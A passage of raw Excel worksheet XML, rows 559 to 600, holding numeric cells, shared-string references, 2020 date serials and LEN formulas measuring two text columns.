    <row r="559" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A559">
        <v>20514</v>
      </c>
      <c r="B559">
        <v>2700</v>
      </c>
      <c r="C559" t="s">
        <v>5810</v>
      </c>
      <c r="D559" t="s">
        <v>10760</v>
      </c>
      <c r="E559">
        <v>18</v>
      </c>
      <c r="F559" t="s">
        <v>5434</v>
      </c>
      <c r="G559" s="1">
        <v>43930</v>
      </c>
      <c r="H559">
        <v>6000</v>
      </c>
      <c r="I559" t="s">
        <v>10762</v>
      </c>
      <c r="J559" t="s">
        <v>10763</v>
      </c>
      <c r="K559">
        <f>LEN(I559)</f>
        <v>37</v>
      </c>
      <c r="L559">
        <f>LEN(J559)</f>
        <v>37</v>
      </c>
    </row>
    <row r="560" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A560">
        <v>20515</v>
      </c>
      <c r="B560">
        <v>2700</v>
      </c>
      <c r="C560" t="s">
        <v>5810</v>
      </c>
      <c r="D560" t="s">
        <v>10760</v>
      </c>
      <c r="E560">
        <v>18</v>
      </c>
      <c r="F560" t="s">
        <v>9595</v>
      </c>
      <c r="G560" s="1">
        <v>43930</v>
      </c>
      <c r="H560">
        <v>6000</v>
      </c>
      <c r="I560" t="s">
        <v>10764</v>
      </c>
      <c r="J560" t="s">
        <v>10763</v>
      </c>
      <c r="K560">
        <f>LEN(I560)</f>
        <v>37</v>
      </c>
      <c r="L560">
        <f>LEN(J560)</f>
        <v>37</v>
      </c>
    </row>
    <row r="561" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A561">
        <v>19852</v>
      </c>
      <c r="B561">
        <v>661</v>
      </c>
      <c r="C561" t="s">
        <v>545</v>
      </c>
      <c r="D561" t="s">
        <v>10284</v>
      </c>
      <c r="E561">
        <v>26</v>
      </c>
      <c r="F561" t="s">
        <v>547</v>
      </c>
      <c r="G561" s="1">
        <v>43896</v>
      </c>
      <c r="H561">
        <v>1700</v>
      </c>
      <c r="I561" t="s">
        <v>10010</v>
      </c>
      <c r="J561" t="s">
        <v>10285</v>
      </c>
      <c r="K561">
        <f>LEN(I561)</f>
        <v>33</v>
      </c>
      <c r="L561">
        <f>LEN(J561)</f>
        <v>37</v>
      </c>
    </row>
    <row r="562" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A562">
        <v>19797</v>
      </c>
      <c r="B562">
        <v>226</v>
      </c>
      <c r="C562" t="s">
        <v>502</v>
      </c>
      <c r="D562" t="s">
        <v>10242</v>
      </c>
      <c r="E562">
        <v>16</v>
      </c>
      <c r="F562" t="s">
        <v>9441</v>
      </c>
      <c r="G562" s="1">
        <v>43922</v>
      </c>
      <c r="H562">
        <v>342992</v>
      </c>
      <c r="J562" t="s">
        <v>10244</v>
      </c>
      <c r="K562">
        <f>LEN(I562)</f>
        <v>0</v>
      </c>
      <c r="L562">
        <f>LEN(J562)</f>
        <v>37</v>
      </c>
    </row>
    <row r="563" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A563">
        <v>20557</v>
      </c>
      <c r="B563">
        <v>2655</v>
      </c>
      <c r="C563" t="s">
        <v>4000</v>
      </c>
      <c r="D563" t="s">
        <v>10808</v>
      </c>
      <c r="E563">
        <v>17</v>
      </c>
      <c r="F563" t="s">
        <v>512</v>
      </c>
      <c r="G563" s="1">
        <v>43923</v>
      </c>
      <c r="H563">
        <v>13000</v>
      </c>
      <c r="J563" t="s">
        <v>10285</v>
      </c>
      <c r="K563">
        <f>LEN(I563)</f>
        <v>0</v>
      </c>
      <c r="L563">
        <f>LEN(J563)</f>
        <v>37</v>
      </c>
    </row>
    <row r="564" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A564">
        <v>20558</v>
      </c>
      <c r="B564">
        <v>2655</v>
      </c>
      <c r="C564" t="s">
        <v>4000</v>
      </c>
      <c r="D564" t="s">
        <v>10808</v>
      </c>
      <c r="E564">
        <v>17</v>
      </c>
      <c r="F564" t="s">
        <v>5434</v>
      </c>
      <c r="G564" s="1">
        <v>43923</v>
      </c>
      <c r="H564">
        <v>10000</v>
      </c>
      <c r="J564" t="s">
        <v>10285</v>
      </c>
      <c r="K564">
        <f>LEN(I564)</f>
        <v>0</v>
      </c>
      <c r="L564">
        <f>LEN(J564)</f>
        <v>37</v>
      </c>
    </row>
    <row r="565" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A565">
        <v>20559</v>
      </c>
      <c r="B565">
        <v>2655</v>
      </c>
      <c r="C565" t="s">
        <v>4000</v>
      </c>
      <c r="D565" t="s">
        <v>10808</v>
      </c>
      <c r="E565">
        <v>17</v>
      </c>
      <c r="F565" t="s">
        <v>9217</v>
      </c>
      <c r="G565" s="1">
        <v>43923</v>
      </c>
      <c r="H565">
        <v>5000</v>
      </c>
      <c r="J565" t="s">
        <v>10285</v>
      </c>
      <c r="K565">
        <f>LEN(I565)</f>
        <v>0</v>
      </c>
      <c r="L565">
        <f>LEN(J565)</f>
        <v>37</v>
      </c>
    </row>
    <row r="566" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A566">
        <v>20560</v>
      </c>
      <c r="B566">
        <v>2655</v>
      </c>
      <c r="C566" t="s">
        <v>4000</v>
      </c>
      <c r="D566" t="s">
        <v>10808</v>
      </c>
      <c r="E566">
        <v>17</v>
      </c>
      <c r="F566" t="s">
        <v>9466</v>
      </c>
      <c r="G566" s="1">
        <v>43923</v>
      </c>
      <c r="H566">
        <v>5000</v>
      </c>
      <c r="J566" t="s">
        <v>10285</v>
      </c>
      <c r="K566">
        <f>LEN(I566)</f>
        <v>0</v>
      </c>
      <c r="L566">
        <f>LEN(J566)</f>
        <v>37</v>
      </c>
    </row>
    <row r="567" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A567">
        <v>19724</v>
      </c>
      <c r="B567">
        <v>737</v>
      </c>
      <c r="C567" t="s">
        <v>87</v>
      </c>
      <c r="D567" t="s">
        <v>10201</v>
      </c>
      <c r="E567">
        <v>17</v>
      </c>
      <c r="F567" t="s">
        <v>2236</v>
      </c>
      <c r="G567" s="1">
        <v>43971</v>
      </c>
      <c r="H567">
        <v>684</v>
      </c>
      <c r="I567" t="s">
        <v>10203</v>
      </c>
      <c r="J567" t="s">
        <v>9494</v>
      </c>
      <c r="K567">
        <f>LEN(I567)</f>
        <v>67</v>
      </c>
      <c r="L567">
        <f>LEN(J567)</f>
        <v>36</v>
      </c>
    </row>
    <row r="568" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A568">
        <v>19389</v>
      </c>
      <c r="B568">
        <v>2553</v>
      </c>
      <c r="C568" t="s">
        <v>4964</v>
      </c>
      <c r="D568" t="s">
        <v>9991</v>
      </c>
      <c r="E568">
        <v>14</v>
      </c>
      <c r="F568" t="s">
        <v>9992</v>
      </c>
      <c r="G568" s="1">
        <v>43908</v>
      </c>
      <c r="H568">
        <v>525000</v>
      </c>
      <c r="I568" t="s">
        <v>9993</v>
      </c>
      <c r="J568" t="s">
        <v>9994</v>
      </c>
      <c r="K568">
        <f>LEN(I568)</f>
        <v>49</v>
      </c>
      <c r="L568">
        <f>LEN(J568)</f>
        <v>36</v>
      </c>
    </row>
    <row r="569" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A569">
        <v>19390</v>
      </c>
      <c r="B569">
        <v>2553</v>
      </c>
      <c r="C569" t="s">
        <v>4964</v>
      </c>
      <c r="D569" t="s">
        <v>9991</v>
      </c>
      <c r="E569">
        <v>14</v>
      </c>
      <c r="F569" t="s">
        <v>9995</v>
      </c>
      <c r="G569" s="1">
        <v>43908</v>
      </c>
      <c r="H569">
        <v>850000</v>
      </c>
      <c r="I569" t="s">
        <v>9993</v>
      </c>
      <c r="J569" t="s">
        <v>9996</v>
      </c>
      <c r="K569">
        <f>LEN(I569)</f>
        <v>49</v>
      </c>
      <c r="L569">
        <f>LEN(J569)</f>
        <v>36</v>
      </c>
    </row>
    <row r="570" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A570">
        <v>19363</v>
      </c>
      <c r="B570">
        <v>590</v>
      </c>
      <c r="C570" t="s">
        <v>9958</v>
      </c>
      <c r="D570" t="s">
        <v>9959</v>
      </c>
      <c r="E570">
        <v>26</v>
      </c>
      <c r="F570" t="s">
        <v>609</v>
      </c>
      <c r="G570" s="1">
        <v>43871</v>
      </c>
      <c r="H570">
        <v>288000</v>
      </c>
      <c r="I570" t="s">
        <v>9961</v>
      </c>
      <c r="J570" t="s">
        <v>9962</v>
      </c>
      <c r="K570">
        <f>LEN(I570)</f>
        <v>45</v>
      </c>
      <c r="L570">
        <f>LEN(J570)</f>
        <v>36</v>
      </c>
    </row>
    <row r="571" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A571">
        <v>19909</v>
      </c>
      <c r="B571">
        <v>2134</v>
      </c>
      <c r="C571" t="s">
        <v>5492</v>
      </c>
      <c r="D571" t="s">
        <v>10322</v>
      </c>
      <c r="E571">
        <v>26</v>
      </c>
      <c r="F571" t="s">
        <v>6917</v>
      </c>
      <c r="G571" s="1">
        <v>43882</v>
      </c>
      <c r="H571">
        <v>108000</v>
      </c>
      <c r="I571" t="s">
        <v>10323</v>
      </c>
      <c r="J571" t="s">
        <v>10324</v>
      </c>
      <c r="K571">
        <f>LEN(I571)</f>
        <v>33</v>
      </c>
      <c r="L571">
        <f>LEN(J571)</f>
        <v>36</v>
      </c>
    </row>
    <row r="572" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A572">
        <v>16890</v>
      </c>
      <c r="B572">
        <v>1381</v>
      </c>
      <c r="C572" t="s">
        <v>2504</v>
      </c>
      <c r="D572" t="s">
        <v>9549</v>
      </c>
      <c r="E572">
        <v>11</v>
      </c>
      <c r="F572" t="s">
        <v>9466</v>
      </c>
      <c r="G572" s="1">
        <v>43913</v>
      </c>
      <c r="H572">
        <v>1000</v>
      </c>
      <c r="I572" t="s">
        <v>9550</v>
      </c>
      <c r="J572" t="s">
        <v>9554</v>
      </c>
      <c r="K572">
        <f>LEN(I572)</f>
        <v>18</v>
      </c>
      <c r="L572">
        <f>LEN(J572)</f>
        <v>36</v>
      </c>
    </row>
    <row r="573" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A573">
        <v>16896</v>
      </c>
      <c r="B573">
        <v>1381</v>
      </c>
      <c r="C573" t="s">
        <v>2504</v>
      </c>
      <c r="D573" t="s">
        <v>9549</v>
      </c>
      <c r="E573">
        <v>11</v>
      </c>
      <c r="F573" t="s">
        <v>9557</v>
      </c>
      <c r="G573" s="1">
        <v>43913</v>
      </c>
      <c r="H573">
        <v>1000</v>
      </c>
      <c r="I573" t="s">
        <v>9550</v>
      </c>
      <c r="J573" t="s">
        <v>9554</v>
      </c>
      <c r="K573">
        <f>LEN(I573)</f>
        <v>18</v>
      </c>
      <c r="L573">
        <f>LEN(J573)</f>
        <v>36</v>
      </c>
    </row>
    <row r="574" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A574">
        <v>20329</v>
      </c>
      <c r="B574">
        <v>482</v>
      </c>
      <c r="C574" t="s">
        <v>863</v>
      </c>
      <c r="D574" t="s">
        <v>10620</v>
      </c>
      <c r="E574">
        <v>6</v>
      </c>
      <c r="F574" t="s">
        <v>9771</v>
      </c>
      <c r="G574" s="1">
        <v>43927</v>
      </c>
      <c r="H574">
        <v>10000</v>
      </c>
      <c r="I574" t="s">
        <v>9550</v>
      </c>
      <c r="J574" t="s">
        <v>9994</v>
      </c>
      <c r="K574">
        <f>LEN(I574)</f>
        <v>18</v>
      </c>
      <c r="L574">
        <f>LEN(J574)</f>
        <v>36</v>
      </c>
    </row>
    <row r="575" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A575">
        <v>20497</v>
      </c>
      <c r="B575">
        <v>512</v>
      </c>
      <c r="C575" t="s">
        <v>16307</v>
      </c>
      <c r="D575" t="s">
        <v>16308</v>
      </c>
      <c r="E575">
        <v>6</v>
      </c>
      <c r="F575" t="s">
        <v>10757</v>
      </c>
      <c r="G575" s="1">
        <v>43927</v>
      </c>
      <c r="H575">
        <v>153577.29999999999</v>
      </c>
      <c r="I575" t="s">
        <v>9550</v>
      </c>
      <c r="J575" t="s">
        <v>9494</v>
      </c>
      <c r="K575">
        <f>LEN(I575)</f>
        <v>18</v>
      </c>
      <c r="L575">
        <f>LEN(J575)</f>
        <v>36</v>
      </c>
    </row>
    <row r="576" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A576">
        <v>20498</v>
      </c>
      <c r="B576">
        <v>512</v>
      </c>
      <c r="C576" t="s">
        <v>967</v>
      </c>
      <c r="D576" t="s">
        <v>10756</v>
      </c>
      <c r="E576">
        <v>6</v>
      </c>
      <c r="F576" t="s">
        <v>9892</v>
      </c>
      <c r="G576" s="1">
        <v>43927</v>
      </c>
      <c r="H576">
        <v>20638</v>
      </c>
      <c r="I576" t="s">
        <v>9550</v>
      </c>
      <c r="J576" t="s">
        <v>9494</v>
      </c>
      <c r="K576">
        <f>LEN(I576)</f>
        <v>18</v>
      </c>
      <c r="L576">
        <f>LEN(J576)</f>
        <v>36</v>
      </c>
    </row>
    <row r="577" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A577">
        <v>20499</v>
      </c>
      <c r="B577">
        <v>512</v>
      </c>
      <c r="C577" t="s">
        <v>16307</v>
      </c>
      <c r="D577" t="s">
        <v>16308</v>
      </c>
      <c r="E577">
        <v>6</v>
      </c>
      <c r="F577" t="s">
        <v>10758</v>
      </c>
      <c r="G577" s="1">
        <v>43927</v>
      </c>
      <c r="H577">
        <v>121740.4</v>
      </c>
      <c r="I577" t="s">
        <v>9550</v>
      </c>
      <c r="J577" t="s">
        <v>9494</v>
      </c>
      <c r="K577">
        <f>LEN(I577)</f>
        <v>18</v>
      </c>
      <c r="L577">
        <f>LEN(J577)</f>
        <v>36</v>
      </c>
    </row>
    <row r="578" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A578">
        <v>20500</v>
      </c>
      <c r="B578">
        <v>512</v>
      </c>
      <c r="C578" t="s">
        <v>967</v>
      </c>
      <c r="D578" t="s">
        <v>10756</v>
      </c>
      <c r="E578">
        <v>6</v>
      </c>
      <c r="F578" t="s">
        <v>1746</v>
      </c>
      <c r="G578" s="1">
        <v>43927</v>
      </c>
      <c r="H578">
        <v>62608</v>
      </c>
      <c r="I578" t="s">
        <v>9550</v>
      </c>
      <c r="J578" t="s">
        <v>9494</v>
      </c>
      <c r="K578">
        <f>LEN(I578)</f>
        <v>18</v>
      </c>
      <c r="L578">
        <f>LEN(J578)</f>
        <v>36</v>
      </c>
    </row>
    <row r="579" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A579">
        <v>20501</v>
      </c>
      <c r="B579">
        <v>512</v>
      </c>
      <c r="C579" t="s">
        <v>16307</v>
      </c>
      <c r="D579" t="s">
        <v>16308</v>
      </c>
      <c r="E579">
        <v>6</v>
      </c>
      <c r="F579" t="s">
        <v>9595</v>
      </c>
      <c r="G579" s="1">
        <v>43927</v>
      </c>
      <c r="H579" s="3" t="s">
        <v>16237</v>
      </c>
      <c r="I579" t="s">
        <v>9550</v>
      </c>
      <c r="J579" t="s">
        <v>9494</v>
      </c>
      <c r="K579">
        <f>LEN(I579)</f>
        <v>18</v>
      </c>
      <c r="L579">
        <f>LEN(J579)</f>
        <v>36</v>
      </c>
    </row>
    <row r="580" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A580">
        <v>19273</v>
      </c>
      <c r="B580">
        <v>2344</v>
      </c>
      <c r="C580" t="s">
        <v>4834</v>
      </c>
      <c r="D580" t="s">
        <v>9893</v>
      </c>
      <c r="E580">
        <v>26</v>
      </c>
      <c r="F580" t="s">
        <v>364</v>
      </c>
      <c r="G580" s="1">
        <v>43881</v>
      </c>
      <c r="H580">
        <v>68000000</v>
      </c>
      <c r="I580" t="s">
        <v>9506</v>
      </c>
      <c r="J580" t="s">
        <v>9894</v>
      </c>
      <c r="K580">
        <f>LEN(I580)</f>
        <v>17</v>
      </c>
      <c r="L580">
        <f>LEN(J580)</f>
        <v>36</v>
      </c>
    </row>
    <row r="581" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A581">
        <v>16712</v>
      </c>
      <c r="B581">
        <v>608</v>
      </c>
      <c r="C581" t="s">
        <v>1106</v>
      </c>
      <c r="D581" t="s">
        <v>9492</v>
      </c>
      <c r="E581">
        <v>13</v>
      </c>
      <c r="F581" t="s">
        <v>9493</v>
      </c>
      <c r="G581" s="1">
        <v>43923</v>
      </c>
      <c r="H581">
        <v>25000</v>
      </c>
      <c r="J581" t="s">
        <v>9494</v>
      </c>
      <c r="K581">
        <f>LEN(I581)</f>
        <v>0</v>
      </c>
      <c r="L581">
        <f>LEN(J581)</f>
        <v>36</v>
      </c>
    </row>
    <row r="582" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A582">
        <v>16845</v>
      </c>
      <c r="B582">
        <v>642</v>
      </c>
      <c r="C582" t="s">
        <v>16309</v>
      </c>
      <c r="D582" t="s">
        <v>16310</v>
      </c>
      <c r="E582">
        <v>10</v>
      </c>
      <c r="F582" t="s">
        <v>9511</v>
      </c>
      <c r="G582" s="1">
        <v>43861</v>
      </c>
      <c r="H582">
        <v>224658.84</v>
      </c>
      <c r="J582" t="s">
        <v>9512</v>
      </c>
      <c r="K582">
        <f>LEN(I582)</f>
        <v>0</v>
      </c>
      <c r="L582">
        <f>LEN(J582)</f>
        <v>36</v>
      </c>
    </row>
    <row r="583" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A583">
        <v>20285</v>
      </c>
      <c r="B583">
        <v>796</v>
      </c>
      <c r="C583" t="s">
        <v>467</v>
      </c>
      <c r="D583" t="s">
        <v>9770</v>
      </c>
      <c r="E583">
        <v>2</v>
      </c>
      <c r="F583" t="s">
        <v>10600</v>
      </c>
      <c r="G583" s="1">
        <v>43997</v>
      </c>
      <c r="H583">
        <v>150000</v>
      </c>
      <c r="J583" t="s">
        <v>10601</v>
      </c>
      <c r="K583">
        <f>LEN(I583)</f>
        <v>0</v>
      </c>
      <c r="L583">
        <f>LEN(J583)</f>
        <v>36</v>
      </c>
    </row>
    <row r="584" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A584">
        <v>19302</v>
      </c>
      <c r="B584">
        <v>2353</v>
      </c>
      <c r="C584" t="s">
        <v>4876</v>
      </c>
      <c r="D584" t="s">
        <v>9906</v>
      </c>
      <c r="E584">
        <v>34</v>
      </c>
      <c r="F584" t="s">
        <v>9907</v>
      </c>
      <c r="G584" s="1">
        <v>43859</v>
      </c>
      <c r="H584">
        <v>300000</v>
      </c>
      <c r="I584" t="s">
        <v>9908</v>
      </c>
      <c r="J584" t="s">
        <v>9909</v>
      </c>
      <c r="K584">
        <f>LEN(I584)</f>
        <v>51</v>
      </c>
      <c r="L584">
        <f>LEN(J584)</f>
        <v>35</v>
      </c>
    </row>
    <row r="585" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A585">
        <v>19366</v>
      </c>
      <c r="B585">
        <v>1971</v>
      </c>
      <c r="C585" t="s">
        <v>4819</v>
      </c>
      <c r="D585" t="s">
        <v>9968</v>
      </c>
      <c r="E585">
        <v>26</v>
      </c>
      <c r="F585" t="s">
        <v>3499</v>
      </c>
      <c r="G585" s="1">
        <v>43847</v>
      </c>
      <c r="H585">
        <v>50</v>
      </c>
      <c r="J585" t="s">
        <v>9909</v>
      </c>
      <c r="K585">
        <f>LEN(I585)</f>
        <v>0</v>
      </c>
      <c r="L585">
        <f>LEN(J585)</f>
        <v>35</v>
      </c>
    </row>
    <row r="586" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A586">
        <v>19429</v>
      </c>
      <c r="B586">
        <v>592</v>
      </c>
      <c r="C586" t="s">
        <v>354</v>
      </c>
      <c r="D586" t="s">
        <v>10032</v>
      </c>
      <c r="E586">
        <v>12</v>
      </c>
      <c r="F586" t="s">
        <v>10033</v>
      </c>
      <c r="G586" s="1">
        <v>43900</v>
      </c>
      <c r="H586">
        <v>1200</v>
      </c>
      <c r="J586" t="s">
        <v>10034</v>
      </c>
      <c r="K586">
        <f>LEN(I586)</f>
        <v>0</v>
      </c>
      <c r="L586">
        <f>LEN(J586)</f>
        <v>35</v>
      </c>
    </row>
    <row r="587" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A587">
        <v>19434</v>
      </c>
      <c r="B587">
        <v>2579</v>
      </c>
      <c r="C587" t="s">
        <v>5115</v>
      </c>
      <c r="D587" t="s">
        <v>10038</v>
      </c>
      <c r="E587">
        <v>12</v>
      </c>
      <c r="F587" t="s">
        <v>10039</v>
      </c>
      <c r="G587" s="1">
        <v>43902</v>
      </c>
      <c r="H587">
        <v>6000</v>
      </c>
      <c r="J587" t="s">
        <v>10034</v>
      </c>
      <c r="K587">
        <f>LEN(I587)</f>
        <v>0</v>
      </c>
      <c r="L587">
        <f>LEN(J587)</f>
        <v>35</v>
      </c>
    </row>
    <row r="588" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A588">
        <v>20164</v>
      </c>
      <c r="B588">
        <v>2676</v>
      </c>
      <c r="C588" t="s">
        <v>5653</v>
      </c>
      <c r="D588" t="s">
        <v>10521</v>
      </c>
      <c r="E588">
        <v>17</v>
      </c>
      <c r="F588" t="s">
        <v>2236</v>
      </c>
      <c r="G588" s="1">
        <v>43990</v>
      </c>
      <c r="H588">
        <v>1000</v>
      </c>
      <c r="J588" t="s">
        <v>10522</v>
      </c>
      <c r="K588">
        <f>LEN(I588)</f>
        <v>0</v>
      </c>
      <c r="L588">
        <f>LEN(J588)</f>
        <v>35</v>
      </c>
    </row>
    <row r="589" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A589">
        <v>19639</v>
      </c>
      <c r="B589">
        <v>722</v>
      </c>
      <c r="C589" t="s">
        <v>344</v>
      </c>
      <c r="D589" t="s">
        <v>10150</v>
      </c>
      <c r="E589">
        <v>10</v>
      </c>
      <c r="F589" t="s">
        <v>10154</v>
      </c>
      <c r="G589" s="1">
        <v>43871</v>
      </c>
      <c r="H589">
        <v>480000</v>
      </c>
      <c r="I589" t="s">
        <v>9485</v>
      </c>
      <c r="J589" t="s">
        <v>10155</v>
      </c>
      <c r="K589">
        <f>LEN(I589)</f>
        <v>18</v>
      </c>
      <c r="L589">
        <f>LEN(J589)</f>
        <v>34</v>
      </c>
    </row>
    <row r="590" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A590">
        <v>19455</v>
      </c>
      <c r="B590">
        <v>2337</v>
      </c>
      <c r="C590" t="s">
        <v>5129</v>
      </c>
      <c r="D590" t="s">
        <v>10053</v>
      </c>
      <c r="E590">
        <v>12</v>
      </c>
      <c r="F590" t="s">
        <v>10057</v>
      </c>
      <c r="G590" s="1">
        <v>44011</v>
      </c>
      <c r="H590">
        <v>80000</v>
      </c>
      <c r="J590" t="s">
        <v>10058</v>
      </c>
      <c r="K590">
        <f>LEN(I590)</f>
        <v>0</v>
      </c>
      <c r="L590">
        <f>LEN(J590)</f>
        <v>34</v>
      </c>
    </row>
    <row r="591" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A591">
        <v>20105</v>
      </c>
      <c r="B591">
        <v>46</v>
      </c>
      <c r="C591" t="s">
        <v>658</v>
      </c>
      <c r="D591" t="s">
        <v>10470</v>
      </c>
      <c r="E591">
        <v>12</v>
      </c>
      <c r="F591" t="s">
        <v>609</v>
      </c>
      <c r="G591" s="1">
        <v>43928</v>
      </c>
      <c r="H591">
        <v>20000</v>
      </c>
      <c r="J591" t="s">
        <v>10476</v>
      </c>
      <c r="K591">
        <f>LEN(I591)</f>
        <v>0</v>
      </c>
      <c r="L591">
        <f>LEN(J591)</f>
        <v>34</v>
      </c>
    </row>
    <row r="592" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A592">
        <v>21236</v>
      </c>
      <c r="B592">
        <v>4771</v>
      </c>
      <c r="C592" t="s">
        <v>7139</v>
      </c>
      <c r="D592" t="s">
        <v>11233</v>
      </c>
      <c r="E592">
        <v>11</v>
      </c>
      <c r="F592" t="s">
        <v>1651</v>
      </c>
      <c r="G592" s="1">
        <v>44102</v>
      </c>
      <c r="H592">
        <v>720000</v>
      </c>
      <c r="I592" t="s">
        <v>10257</v>
      </c>
      <c r="J592" t="s">
        <v>11234</v>
      </c>
      <c r="K592">
        <f>LEN(I592)</f>
        <v>161</v>
      </c>
      <c r="L592">
        <f>LEN(J592)</f>
        <v>33</v>
      </c>
    </row>
    <row r="593" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A593">
        <v>21060</v>
      </c>
      <c r="B593">
        <v>2822</v>
      </c>
      <c r="C593" t="s">
        <v>7050</v>
      </c>
      <c r="D593" t="s">
        <v>11119</v>
      </c>
      <c r="E593">
        <v>16</v>
      </c>
      <c r="F593" t="s">
        <v>2105</v>
      </c>
      <c r="G593" s="1">
        <v>44155</v>
      </c>
      <c r="H593">
        <v>720000</v>
      </c>
      <c r="I593" t="s">
        <v>11120</v>
      </c>
      <c r="J593" t="s">
        <v>11121</v>
      </c>
      <c r="K593">
        <f>LEN(I593)</f>
        <v>17</v>
      </c>
      <c r="L593">
        <f>LEN(J593)</f>
        <v>33</v>
      </c>
    </row>
    <row r="594" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A594">
        <v>20220</v>
      </c>
      <c r="B594">
        <v>2609</v>
      </c>
      <c r="C594" t="s">
        <v>5768</v>
      </c>
      <c r="D594" t="s">
        <v>10560</v>
      </c>
      <c r="E594">
        <v>16</v>
      </c>
      <c r="F594" t="s">
        <v>9610</v>
      </c>
      <c r="G594" s="1">
        <v>43922</v>
      </c>
      <c r="H594">
        <v>10000</v>
      </c>
      <c r="J594" t="s">
        <v>10561</v>
      </c>
      <c r="K594">
        <f>LEN(I594)</f>
        <v>0</v>
      </c>
      <c r="L594">
        <f>LEN(J594)</f>
        <v>33</v>
      </c>
    </row>
    <row r="595" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A595">
        <v>20386</v>
      </c>
      <c r="B595">
        <v>532</v>
      </c>
      <c r="C595" t="s">
        <v>982</v>
      </c>
      <c r="D595" t="s">
        <v>10675</v>
      </c>
      <c r="E595">
        <v>12</v>
      </c>
      <c r="F595" t="s">
        <v>10680</v>
      </c>
      <c r="G595" s="1">
        <v>43949</v>
      </c>
      <c r="H595">
        <v>200000</v>
      </c>
      <c r="J595" t="s">
        <v>10681</v>
      </c>
      <c r="K595">
        <f>LEN(I595)</f>
        <v>0</v>
      </c>
      <c r="L595">
        <f>LEN(J595)</f>
        <v>33</v>
      </c>
    </row>
    <row r="596" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A596">
        <v>20389</v>
      </c>
      <c r="B596">
        <v>532</v>
      </c>
      <c r="C596" t="s">
        <v>982</v>
      </c>
      <c r="D596" t="s">
        <v>10675</v>
      </c>
      <c r="E596">
        <v>12</v>
      </c>
      <c r="F596" t="s">
        <v>7818</v>
      </c>
      <c r="G596" s="1">
        <v>43949</v>
      </c>
      <c r="H596">
        <v>120000</v>
      </c>
      <c r="J596" t="s">
        <v>10681</v>
      </c>
      <c r="K596">
        <f>LEN(I596)</f>
        <v>0</v>
      </c>
      <c r="L596">
        <f>LEN(J596)</f>
        <v>33</v>
      </c>
    </row>
    <row r="597" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A597">
        <v>20577</v>
      </c>
      <c r="B597">
        <v>2719</v>
      </c>
      <c r="C597" t="s">
        <v>6860</v>
      </c>
      <c r="D597" t="s">
        <v>10823</v>
      </c>
      <c r="E597">
        <v>13</v>
      </c>
      <c r="F597" t="s">
        <v>2236</v>
      </c>
      <c r="G597" s="1">
        <v>44007</v>
      </c>
      <c r="H597">
        <v>55097</v>
      </c>
      <c r="J597" t="s">
        <v>10826</v>
      </c>
      <c r="K597">
        <f>LEN(I597)</f>
        <v>0</v>
      </c>
      <c r="L597">
        <f>LEN(J597)</f>
        <v>33</v>
      </c>
    </row>
    <row r="598" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A598">
        <v>20201</v>
      </c>
      <c r="B598">
        <v>2701</v>
      </c>
      <c r="C598" t="s">
        <v>16301</v>
      </c>
      <c r="D598" t="s">
        <v>16302</v>
      </c>
      <c r="E598">
        <v>12</v>
      </c>
      <c r="F598" t="s">
        <v>9820</v>
      </c>
      <c r="G598" s="1">
        <v>43964</v>
      </c>
      <c r="H598" s="4">
        <v>1200000</v>
      </c>
      <c r="I598" t="s">
        <v>10548</v>
      </c>
      <c r="J598" t="s">
        <v>9555</v>
      </c>
      <c r="K598">
        <f>LEN(I598)</f>
        <v>35</v>
      </c>
      <c r="L598">
        <f>LEN(J598)</f>
        <v>32</v>
      </c>
    </row>
    <row r="599" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A599">
        <v>16891</v>
      </c>
      <c r="B599">
        <v>1381</v>
      </c>
      <c r="C599" t="s">
        <v>2504</v>
      </c>
      <c r="D599" t="s">
        <v>9549</v>
      </c>
      <c r="E599">
        <v>11</v>
      </c>
      <c r="F599" t="s">
        <v>9483</v>
      </c>
      <c r="G599" s="1">
        <v>43913</v>
      </c>
      <c r="H599">
        <v>3000</v>
      </c>
      <c r="I599" t="s">
        <v>9550</v>
      </c>
      <c r="J599" t="s">
        <v>9555</v>
      </c>
      <c r="K599">
        <f>LEN(I599)</f>
        <v>18</v>
      </c>
      <c r="L599">
        <f>LEN(J599)</f>
        <v>32</v>
      </c>
    </row>
    <row r="600" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A600">
        <v>16897</v>
      </c>
      <c r="B600">
        <v>1381</v>
      </c>
      <c r="C600" t="s">
        <v>2504</v>
      </c>
      <c r="D600" t="s">
        <v>9549</v>
      </c>
      <c r="E600">
        <v>11</v>
      </c>
      <c r="F600" t="s">
        <v>9558</v>
